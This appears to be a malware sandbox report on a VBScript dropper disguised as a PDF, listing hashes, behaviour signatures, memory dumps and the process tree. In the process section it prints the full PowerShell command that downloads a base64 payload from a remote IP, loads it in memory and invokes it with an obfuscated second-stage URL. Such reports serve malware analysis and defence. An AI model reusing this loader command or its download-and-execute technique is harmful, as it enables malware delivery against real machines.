Analysis

max time kernel: 43s
max time network: 45s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 27-09-2022 19:45

Static task: static1
Behavioral task: behavioral1
Sample: TV06KSFYOU_002_PDF.vbs
Resource: win7-20220812-en (windows7-x64)
5 signatures
150 seconds
General

Target: TV06KSFYOU_002_PDF.vbs
Size: 577KB
MD5: 92be06b804449682d272f3afc76aca5f
SHA1: f575b8712aa0f0720b6ad981ca8bbe682badd1d8
SHA256: e596d827af9b25d8348caffa981f5ef4a6ea88bfcfb35e5a5d2d337d6bf90aa9
SHA512: 09b067ad4507a7efbd075a3d8400e63627d62d4bf9e542fb527755eac71240e556ae9b4f45e408e2b4d9dfe42688c18b9dd0a4007ca23dc77d8d16449808068c
SSDEEP: 96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHA:cKLosxvRG
Score: 10/10
Malware Config

Extracted
Language: ps1
Deobfuscated
URLs
ps1.dropper: http://20.7.14.99/dll/dll_ink.pdf
Signatures

Blocklisted process makes network request (1 IoCs)
Processes:
  flow 3, pid 936, process powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid 936, process powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description Token: SeDebugPrivilege, pid 936, process powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  PID 1964 wrote to memory of 936: 1964 WScript.exe -> powershell.exe
  PID 1964 wrote to memory of 936: 1964 WScript.exe -> powershell.exe
  PID 1964 wrote to memory of 936: 1964 WScript.exe -> powershell.exe
Processes

1. C:\Windows\System32\WScript.exe (PID 1964)
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TV06KSFYOU_002_PDF.vbs"
   - Suspicious use of WriteProcessMemory

2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 936, child of 1)
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('fdbd2471442d-d42a-e044-ff2d-d8c5491d=nekot&aidem=tla?txt.hdcnysaer/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
   - Blocklisted process makes network request
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

memory/936-55-0x0000000000000000-mapping.dmp
memory/936-57-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp (Filesize 10.1MB)
memory/936-59-0x0000000002444000-0x0000000002447000-memory.dmp (Filesize 12KB)
memory/936-58-0x000007FEF3900000-0x000007FEF445D000-memory.dmp (Filesize 11.4MB)
memory/936-60-0x000000001B700000-0x000000001B9FF000-memory.dmp (Filesize 3.0MB)
memory/936-61-0x000000000244B000-0x000000000246A000-memory.dmp (Filesize 124KB)
memory/936-62-0x0000000002444000-0x0000000002447000-memory.dmp (Filesize 12KB)
memory/936-63-0x000000000244B000-0x000000000246A000-memory.dmp (Filesize 124KB)
memory/1964-54-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp (Filesize 8KB)